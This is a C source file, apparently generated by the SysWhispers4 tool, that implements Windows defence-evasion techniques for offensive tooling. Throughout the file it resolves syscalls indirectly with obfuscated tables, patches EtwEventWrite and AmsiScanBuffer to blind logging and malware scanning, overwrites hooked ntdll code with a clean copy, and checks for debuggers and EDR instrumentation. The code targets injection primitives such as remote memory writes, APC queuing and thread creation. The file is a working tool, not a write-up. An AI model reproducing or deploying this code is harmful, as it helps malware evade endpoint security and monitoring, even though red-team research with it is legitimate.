/*
 * SCSyscalls.c -- generated by SysWhispers4
 * DO NOT EDIT -- regenerate with syswhispers.py
 *
 * Resolution : recycled
 * Method     : indirect
 * Arch       : x64
 */
#include "SCSyscalls.h"
#include <stddef.h>
#include <string.h>

 /* =========================================================================
  *  Constants
  * ========================================================================= */
#define SC_FUNC_COUNT    68U
#define SC_MAX_EXPORTS   1024U
#define SC_GADGET_POOL   0U
#define SC_GADGET_MASK   (-1U)  /* pool must be power of 2 */

  /* XOR key for SSN decryption */
#define SC_XOR_KEY 0x30C673B1U
#define SC_DECRYPT(v) ((DWORD)((v) ^ SC_XOR_KEY))

/* DJB2 hashes of function names (compile-time) */
static const DWORD SC_FuncHashes[SC_FUNC_COUNT] = {
	0xF2B988E4U,  /* NtWriteFile */
	0xCF28AFFEU,  /* NtContinue */
	0x4D230412U,  /* NtQueueApcThread */
	0x8BE68952U,  /* NtQueryInformationProcess */
	0xAB901526U,  /* NtOpenProcessTokenEx */
	0x0D11FB0DU,  /* NtTerminateProcess */
	0x7473FDF5U,  /* NtUnmapViewOfSection */
	0x1E8A3A05U,  /* NtOpenThread */
	0xA07605B0U,  /* NtCreateProcess */
	0xACBF3D70U,  /* NtImpersonateThread */
	0xD880C175U,  /* NtAdjustPrivilegesToken */
	0xB01F5300U,  /* NtWaitForSingleObject */
	0x98B61166U,  /* NtAlertResumeThread */
	0xF43A35ADU,  /* NtOpenFile */
	0xEE931259U,  /* NtWaitForMultipleObjects */
	0x411B83A2U,  /* NtWriteVirtualMemory */
	0x9AD13387U,  /* NtTestAlert */
	0x6C823B4DU,  /* NtRollbackTransaction */
	0xBA36B4DAU,  /* NtSetTimer */
	0xF866D229U,  /* NtClose */
	0xFB35E01FU,  /* NtAlertThread */
	0xF2F58521U,  /* NtCreateUserProcess */
	0x55F898BCU,  /* NtUnloadDriver */
	0xBB698411U,  /* NtSetEvent */
	0xDA22F84EU,  /* NtMapViewOfSection */
	0x194B7058U,  /* NtDelayExecution */
	0xE03939BBU,  /* NtSuspendThread */
	0xECE1927BU,  /* NtOpenProcessToken */
	0x92D20E8FU,  /* NtFlushInstructionCache */
	0x960E3AEDU,  /* NtCreateProcessEx */
	0x22482860U,  /* NtDeviceIoControlFile */
	0x08661C71U,  /* NtSetInformationVirtualMemory */
	0xCD363694U,  /* NtProtectVirtualMemory */
	0xFC8A53B7U,  /* NtQueryInformationThread */
	0xBFC8B678U,  /* NtGetContextThread */
	0xAED3CBA0U,  /* NtOpenProcess */
	0x97CF1BFFU,  /* NtSetInformationThread */
	0xC1D2B9C2U,  /* NtQueryInformationToken */
	0x21F4488FU,  /* NtQueueApcThreadEx */
	0x46E3363FU,  /* NtAllocateVirtualMemoryEx */
	0xFC182B93U,  /* NtDuplicateToken */
	0x4133597DU,  /* NtDuplicateObject */
	0x2143A5FEU,  /* NtOpenThreadToken */
	0xC063C6B5U,  /* NtQueryVirtualMemory */
	0xD797B1BDU,  /* NtCreateFile */
	0xF1D7CE2AU,  /* NtCommitTransaction */
	0x01D8A572U,  /* NtCreateSection */
	0xF0146CE2U,  /* NtAllocateVirtualMemory */
	0xC9D6CF7CU,  /* NtCreateTimer */
	0xA6572ADCU,  /* NtQuerySystemInformation */
	0x1EAE8F20U,  /* NtDeleteFile */
	0xCA76EBB7U,  /* NtCreateEvent */
	0xDCAE8E80U,  /* NtQueryObject */
	0x79BE767FU,  /* NtCreateTransaction */
	0xAF9FFAABU,  /* NtFreeVirtualMemory */
	0x819AD795U,  /* NtSignalAndWaitForSingleObject */
	0xD94EF14BU,  /* NtReadFile */
	0xFB1E96C7U,  /* NtLoadDriver */
	0xD8FDE5ECU,  /* NtSetContextThread */
	0xBB485288U,  /* NtCreateThreadEx */
	0x287E0FDEU,  /* NtSuspendProcess */
	0x5AC9EF62U,  /* NtOpenSection */
	0xE88BED2DU,  /* NtReadVirtualMemory */
	0xE910BA08U,  /* NtTerminateThread */
	0x38DA918DU,  /* NtResumeProcess */
	0x95EC6386U,  /* NtResetEvent */
	0xDAE08088U,  /* NtResumeThread */
	0x7DB01A1AU,  /* NtSetInformationProcess */
};

/* =========================================================================
 *  Runtime tables (populated by SC_Initialize)
 * ========================================================================= */
DWORD  SC_SsnTable[SC_FUNC_COUNT];          /* SSN for each function */
PVOID SC_SyscallAddrTable[SC_FUNC_COUNT];  /* addr of syscall;ret in ntdll */

/* =========================================================================
 *  DJB2 hash (matches compile-time hashes above)
 * ========================================================================= */
static DWORD SC_HashStr(const char* s)
{
	DWORD h = 0x1505U;
	while (*s)
	{
		h = ((h << 5) + h) ^ (unsigned char)*s++;
	}
	return h;
}

/* =========================================================================
 *  Locate ntdll.dll via PEB (no Win32 API calls)
 * ========================================================================= */
static PVOID SC_GetNtdllBase(VOID)
{
	PPEB pPeb = (PPEB)__readgsqword(0x60);
	PPEB_LDR_DATA   pLdr = pPeb->Ldr;
	PLIST_ENTRY     pHead = &pLdr->InMemoryOrderModuleList;
	PLIST_ENTRY     pEntry = pHead->Flink; /* exe */
	pEntry = pEntry->Flink;               /* ntdll (always 2nd in InMemoryOrder) */
	PLDR_DATA_TABLE_ENTRY pMod =
		CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
	return pMod->DllBase;
}

/* Get own image base via PEB */
static PVOID SC_GetOwnImageBase(VOID)
{
	PPEB pPeb = (PPEB)__readgsqword(0x60);
	PLIST_ENTRY pHead = &pPeb->Ldr->InMemoryOrderModuleList;
	PLDR_DATA_TABLE_ENTRY pMod =
		CONTAINING_RECORD(pHead->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
	return pMod->DllBase;
}

/* =========================================================================
 *  EAT utility: find export by hash
 * ========================================================================= */
static PVOID SC_GetProcByHash(PVOID pModule, DWORD dwHash)
{
	PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
	PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
	PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(
		(PBYTE)pModule +
		pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	PDWORD pFnArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfFunctions);
	PDWORD pNmArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfNames);
	PWORD  pOrArr = (PWORD)((PBYTE)pModule + pExp->AddressOfNameOrdinals);

	for (DWORD i = 0; i < pExp->NumberOfNames; i++)
	{
		const char* pName = (const char*)((PBYTE)pModule + pNmArr[i]);
		if (SC_HashStr(pName) == dwHash)
			return (PVOID)((PBYTE)pModule + pFnArr[pOrArr[i]]);
	}
	return NULL;
}

/* Find export by name string (for VEH-based methods) */
static PVOID SC_GetProcByName(PVOID pModule, const char* szName)
{
	PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
	PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
	PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(
		(PBYTE)pModule +
		pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	PDWORD pFnArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfFunctions);
	PDWORD pNmArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfNames);
	PWORD  pOrArr = (PWORD)((PBYTE)pModule + pExp->AddressOfNameOrdinals);

	for (DWORD i = 0; i < pExp->NumberOfNames; i++)
	{
		const char* pName = (const char*)((PBYTE)pModule + pNmArr[i]);
		DWORD j = 0;
		while (pName[j] && szName[j] && pName[j] == szName[j]) j++;
		if (pName[j] == 0 && szName[j] == 0)
			return (PVOID)((PBYTE)pModule + pFnArr[pOrArr[i]]);
	}
	return NULL;
}

/* =========================================================================
 *  Insertion-sort helper for export arrays (avoids qsort dependency)
 * ========================================================================= */
static VOID SC_SortExports(PSC_EXPORT arr, DWORD n)
{
	for (DWORD i = 1; i < n; i++)
	{
		SC_EXPORT key = arr[i];
		LONG j = (LONG)i - 1;
		while (j >= 0 && arr[j].Address > key.Address)
		{
			arr[j + 1] = arr[j];
			j--;
		}
		arr[j + 1] = key;
	}
}

/* =========================================================================
 *  Parse PE section headers (used by multiple evasion techniques)
 * ========================================================================= */
static PIMAGE_SECTION_HEADER SC_FindSection(PVOID pModule, const char* name)
{
	PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
	PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
	PIMAGE_SECTION_HEADER pSec = IMAGE_FIRST_SECTION(pNt);

	for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++, pSec++)
	{
		BOOL match = TRUE;
		for (int j = 0; name[j]; j++)
		{
			if (pSec->Name[j] != (BYTE)name[j])
			{
				match = FALSE; break;
			}
		}
		if (match) return pSec;
	}
	return NULL;
}

/* =========================================================================
 *  RecycledGate SSN resolution
 *  Combines the reliability of FreshyCalls (sort-by-VA) with opcode
 *  validation from Hell's Gate. For each function:
 *    1. Get candidate SSN from sorted position (FreshyCalls)
 *    2. If stub is clean, verify SSN matches opcode (double-check)
 *    3. If stub is hooked, trust the sorted-index SSN (hook-resistant)
 *
 *  This is the most resilient method: even if hooks reorder stubs or
 *  modify opcodes, the VA-sort gives the correct SSN.
 *  Inspired by RecycledGate (thefLink).
 * ========================================================================= */
static BOOL SC_RecycledGate(PVOID pNtdll)
{
	PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pNtdll;
	PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((PBYTE)pNtdll + pDos->e_lfanew);
	PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(
		(PBYTE)pNtdll +
		pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	PDWORD pFnArr = (PDWORD)((PBYTE)pNtdll + pExp->AddressOfFunctions);
	PDWORD pNmArr = (PDWORD)((PBYTE)pNtdll + pExp->AddressOfNames);
	PWORD  pOrArr = (PWORD)((PBYTE)pNtdll + pExp->AddressOfNameOrdinals);

	/* Collect and sort Nt* exports */
	SC_EXPORT exports[SC_MAX_EXPORTS];
	DWORD count = 0;

	for (DWORD i = 0; i < pExp->NumberOfNames && count < SC_MAX_EXPORTS; i++)
	{
		const char* pName = (const char*)((PBYTE)pNtdll + pNmArr[i]);
		if (pName[0] == 'N' && pName[1] == 't')
		{
			exports[count].Address = (PVOID)((PBYTE)pNtdll + pFnArr[pOrArr[i]]);
			exports[count].Hash = SC_HashStr(pName);
			exports[count].Ordinal = i;
			count++;
		}
	}

	SC_SortExports(exports, count);

	/* Resolve each target function */
	for (DWORD fi = 0; fi < SC_FUNC_COUNT; fi++)
	{
		for (DWORD ei = 0; ei < count; ei++)
		{
			if (exports[ei].Hash == SC_FuncHashes[fi])
			{
				PBYTE pStub = (PBYTE)exports[ei].Address;
				DWORD candidateSsn = ei;  /* FreshyCalls SSN */
				BOOL  opcodeValid = FALSE;

				/* Try to validate with opcode if stub is clean */
				for (DWORD k = 0; k < 32; k++)
				{
					if (pStub[k] == 0x4Cu && pStub[k + 1u] == 0x8Bu &&
						pStub[k + 2u] == 0xD1u && pStub[k + 3u] == 0xB8u)
					{
						DWORD opcodeSsn = (DWORD)pStub[k + 4u] | ((DWORD)pStub[k + 5u] << 8u);
						/* Cross-validate: if both agree, high confidence */
						if (opcodeSsn == candidateSsn)
						{
							opcodeValid = TRUE;
						}
						else
						{
							/* Mismatch: trust opcode if stub looks clean */
							if (pStub[0] != 0xE9u && pStub[0] != 0xFFu &&
								pStub[0] != 0xCCu && pStub[0] != 0xEBu)
								candidateSsn = opcodeSsn;
						}
						break;
					}
				}

				SC_SsnTable[fi] = (candidateSsn) ^ SC_XOR_KEY;

				/* Record gadget address for indirect/randomized invocation */
				for (DWORD sk = 0; sk < 32; sk++)
				{
					if (pStub[sk] == 0x0Fu && pStub[sk + 1u] == 0x05u)
					{
						SC_SyscallAddrTable[fi] = pStub + sk;
						break;
					}
				}
				break;
			}
		}
	}
	return TRUE;
}



/* =========================================================================
 *  ETW user-mode bypass
 *  Patches ntdll!EtwEventWrite to return STATUS_ACCESS_DENIED immediately,
 *  suppressing user-mode ETW event delivery from the current process.
 *
 *  NOTE: This does NOT bypass kernel-mode ETW-Ti callbacks.
 *        Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SC_PatchEtw(VOID)
{
	PVOID pNtdll = SC_GetNtdllBase();
	PVOID pTarget = SC_GetProcByHash(pNtdll, 0x73CDCA72U);
	if (!pTarget) return FALSE;

	DWORD oldProt = 0;
	if (!VirtualProtect(pTarget, 16, PAGE_EXECUTE_READWRITE, &oldProt))
		return FALSE;

	/* Patch: mov eax, 0xC0000022 (STATUS_ACCESS_DENIED); ret */
	PBYTE p_patch = (PBYTE)pTarget;
	p_patch[0] = 0xB8u;
	*(DWORD*)(p_patch + 1) = 0xC0000022u;  /* STATUS_ACCESS_DENIED */
	p_patch[5] = 0xC3u;                    /* ret */

	VirtualProtect(pTarget, 16, oldProt, &oldProt);
	return TRUE;
}

/* =========================================================================
 *  AMSI bypass
 *  Patches amsi.dll!AmsiScanBuffer to always return AMSI_RESULT_CLEAN.
 *  If amsi.dll is not loaded, it returns TRUE (nothing to patch).
 *
 *  Technique: Overwrite AmsiScanBuffer with:
 *    xor eax, eax     (B8 00 00 00 80 -> mov eax, 0x80004005 replaced)
 *    ret
 *
 *  NOTE: Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SC_PatchAmsi(VOID)
{
	/* Find amsi.dll -- it may not be loaded yet */
	HMODULE hAmsi = GetModuleHandleA("amsi.dll");
	if (!hAmsi)
	{
		/* Try loading -- some processes load it lazily */
		hAmsi = LoadLibraryA("amsi.dll");
		if (!hAmsi) return TRUE;  /* Not present, nothing to patch */
	}

	/* Find AmsiScanBuffer using hash */
	PVOID pTarget = SC_GetProcByHash((PVOID)hAmsi, 0x33F967CCU);
	if (!pTarget) return FALSE;

	DWORD oldProt = 0;
	if (!VirtualProtect(pTarget, 16, PAGE_EXECUTE_READWRITE, &oldProt))
		return FALSE;

	/* Patch: mov eax, 0x80070057 (E_INVALIDARG); ret
	 * This makes AMSI think the scan arguments are invalid -> skip scan */
	PBYTE patch = (PBYTE)pTarget;
	patch[0] = 0xB8u;                         /* mov eax, imm32 */
	*(DWORD*)(patch + 1) = 0x80070057u;       /* E_INVALIDARG */
	patch[5] = 0xC3u;                         /* ret */

	VirtualProtect(pTarget, 16, oldProt, &oldProt);
	return TRUE;
}

/* =========================================================================
 *  ntdll Unhooking
 *  Maps a clean copy of ntdll from \KnownDlls\ntdll.dll and overwrites
 *  the .text section of the in-memory (hooked) ntdll with the clean bytes.
 *
 *  This completely removes ALL inline hooks from ntdll, making all
 *  subsequent NT API calls go through the original code paths.
 *
 *  Flow:
 *    1. Open \KnownDlls\ntdll.dll section
 *    2. Map clean copy read-only
 *    3. Find .text section in both copies
 *    4. VirtualProtect in-memory .text to RWX
 *    5. memcpy clean .text over hooked .text
 *    6. Restore original protection
 *    7. Unmap clean copy
 *
 *  NOTE: Call BEFORE SC_Initialize() for best results (clean SSN resolution).
 *        Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SC_UnhookNtdll(VOID)
{
	/* We need the real ntdll functions to map the clean copy.
	 * Even if hooked, they still work -- hooks just monitor/log. */
	typedef NTSTATUS(NTAPI* pfnNtOpenSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES);
	typedef NTSTATUS(NTAPI* pfnNtMapViewOfSection)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);
	typedef NTSTATUS(NTAPI* pfnNtUnmapViewOfSection)(HANDLE, PVOID);
	typedef NTSTATUS(NTAPI* pfnNtClose)(HANDLE);

	PVOID pNtdll = SC_GetNtdllBase();
	if (!pNtdll) return FALSE;

	pfnNtOpenSection pOpen = (pfnNtOpenSection)SC_GetProcByHash(pNtdll, 0x5AC9EF62U);
	pfnNtMapViewOfSection pMap = (pfnNtMapViewOfSection)SC_GetProcByHash(pNtdll, 0xDA22F84EU);
	pfnNtUnmapViewOfSection pUnmap = (pfnNtUnmapViewOfSection)SC_GetProcByHash(pNtdll, 0x7473FDF5U);
	pfnNtClose pClose = (pfnNtClose)SC_GetProcByHash(pNtdll, 0xF866D229U);

	if (!pOpen || !pMap || !pUnmap || !pClose) return FALSE;

	/* Open clean ntdll from KnownDlls */
	UNICODE_STRING usName;
	usName.Length = 24 * sizeof(WCHAR);
	usName.MaximumLength = usName.Length + sizeof(WCHAR);
	usName.Buffer = L"\\KnownDlls\\ntdll.dll";

	OBJECT_ATTRIBUTES oa;
	memset(&oa, 0, sizeof(oa));
	oa.Length = sizeof(OBJECT_ATTRIBUTES);
	oa.ObjectName = &usName;

	HANDLE hSection = NULL;
	NTSTATUS status = pOpen(&hSection, SECTION_MAP_READ, &oa);
	if (!NT_SUCCESS(status)) return FALSE;

	PVOID  pClean = NULL;
	SIZE_T viewSize = 0;
	status = pMap(hSection, (HANDLE)-1, &pClean, 0, 0, NULL, &viewSize, 1, 0, PAGE_READONLY);
	if (!NT_SUCCESS(status))
	{
		pClose(hSection);
		return FALSE;
	}

	/* Find .text section in both copies */
	PIMAGE_SECTION_HEADER pSecHooked = SC_FindSection(pNtdll, ".text");
	PIMAGE_SECTION_HEADER pSecClean = SC_FindSection(pClean, ".text");

	if (!pSecHooked || !pSecClean)
	{
		pUnmap((HANDLE)-1, pClean);
		pClose(hSection);
		return FALSE;
	}

	/* Overwrite hooked .text with clean .text */
	PBYTE pDst = (PBYTE)pNtdll + pSecHooked->VirtualAddress;
	PBYTE pSrc = (PBYTE)pClean + pSecClean->VirtualAddress;
	DWORD dwSize = pSecClean->Misc.VirtualSize;

	DWORD oldProt = 0;
	if (!VirtualProtect(pDst, dwSize, PAGE_EXECUTE_READWRITE, &oldProt))
	{
		pUnmap((HANDLE)-1, pClean);
		pClose(hSection);
		return FALSE;
	}

	memcpy(pDst, pSrc, dwSize);
	VirtualProtect(pDst, dwSize, oldProt, &oldProt);

	/* Cleanup */
	pUnmap((HANDLE)-1, pClean);
	pClose(hSection);
	return TRUE;
}

/* =========================================================================
 *  Anti-debugging checks
 *  Performs multiple checks to detect debugger presence:
 *    1. PEB.BeingDebugged flag
 *    2. PEB.NtGlobalFlag (typical debugger flags)
 *    3. RDTSC timing check (detect single-stepping)
 *    4. NtQueryInformationProcess(ProcessDebugPort)
 *    5. Heap flags check
 *    6. Instrumentation callback detection
 *
 *  Returns TRUE if environment appears clean, FALSE if debugger detected.
 * ========================================================================= */

 /* Canary value for integrity validation */
#define SC_CANARY 0x41694D28U

BOOL SC_AntiDebugCheck(VOID)
{
	PPEB pPeb;
#if defined(_WIN64)
	pPeb = (PPEB)__readgsqword(0x60);
#else
	pPeb = (PPEB)__readfsdword(0x30);
#endif

	/* Check 1: PEB.BeingDebugged */
	if (pPeb->BeingDebugged)
		return FALSE;

	/* Check 2: NtGlobalFlag -- debuggers often set 0x70 (FLG_HEAP_*) */
#if defined(_WIN64)
	DWORD ntGlobalFlag = *(DWORD*)((PBYTE)pPeb + 0xBC);
#else
	DWORD ntGlobalFlag = *(DWORD*)((PBYTE)pPeb + 0x68);
#endif
	if (ntGlobalFlag & 0x70)
		return FALSE;

	/* Check 3: RDTSC timing -- single-stepping causes large deltas */
	ULONGLONG tsc1, tsc2;
	tsc1 = __rdtsc();
	/* Dummy operations to create measurable interval */
	volatile DWORD dummy = 0;
	for (int i = 0; i < 100; i++) dummy += i;
	tsc2 = __rdtsc();
	/* Threshold: > 10000 cycles suggests debugging */
	if ((tsc2 - tsc1) > 10000)
		return FALSE;

	/* Check 4: NtQueryInformationProcess(ProcessDebugPort) */
	typedef NTSTATUS(NTAPI* pfnNtQueryInformationProcess)(
		HANDLE, DWORD, PVOID, ULONG, PULONG);
	PVOID pNtdll = SC_GetNtdllBase();
	pfnNtQueryInformationProcess pQip = (pfnNtQueryInformationProcess)
		SC_GetProcByHash(pNtdll, 0x8BE68952U);
	if (pQip)
	{
		DWORD_PTR debugPort = 0;
		NTSTATUS status = pQip((HANDLE)-1, 7 /* ProcessDebugPort */,
							   &debugPort, sizeof(debugPort), NULL);
		if (NT_SUCCESS(status) && debugPort != 0)
			return FALSE;
	}

	/* Check 5: Heap flags */
	PVOID pHeap;
#if defined(_WIN64)
	pHeap = *(PVOID*)((PBYTE)pPeb + 0x30);
	DWORD heapFlags = *(DWORD*)((PBYTE)pHeap + 0x70);
#else
	pHeap = *(PVOID*)((PBYTE)pPeb + 0x18);
	DWORD heapFlags = *(DWORD*)((PBYTE)pHeap + 0x40);
#endif
	if (heapFlags & ~0x02)  /* Only HEAP_GROWABLE should be set */
		return FALSE;

	/* Check 6: Instrumentation callback -- EDRs may set this */
	typedef NTSTATUS(NTAPI* pfnNtQip)(HANDLE, DWORD, PVOID, ULONG, PULONG);
	pfnNtQip pQip2 = (pfnNtQip)pQip;
	if (pQip2)
	{
		BYTE buffer[64];
		memset(buffer, 0, sizeof(buffer));
		NTSTATUS status = pQip2((HANDLE)-1, 40 /* ProcessInstrumentationCallback */,
								buffer, sizeof(buffer), NULL);
		/* If the callback pointer is non-NULL, something is monitoring */
		if (NT_SUCCESS(status))
		{
			PVOID pCallback = *(PVOID*)(buffer + sizeof(PVOID));
			if (pCallback != NULL)
				return FALSE;
		}
	}

	return TRUE;
}

/* =========================================================================
 *  SC_Initialize -- call once at process/shellcode startup
 * ========================================================================= */
BOOL SC_Initialize(VOID)
{
	PVOID pNtdll = SC_GetNtdllBase();
	if (!pNtdll)
	{
		return FALSE;
	}

	return SC_RecycledGate(pNtdll);
}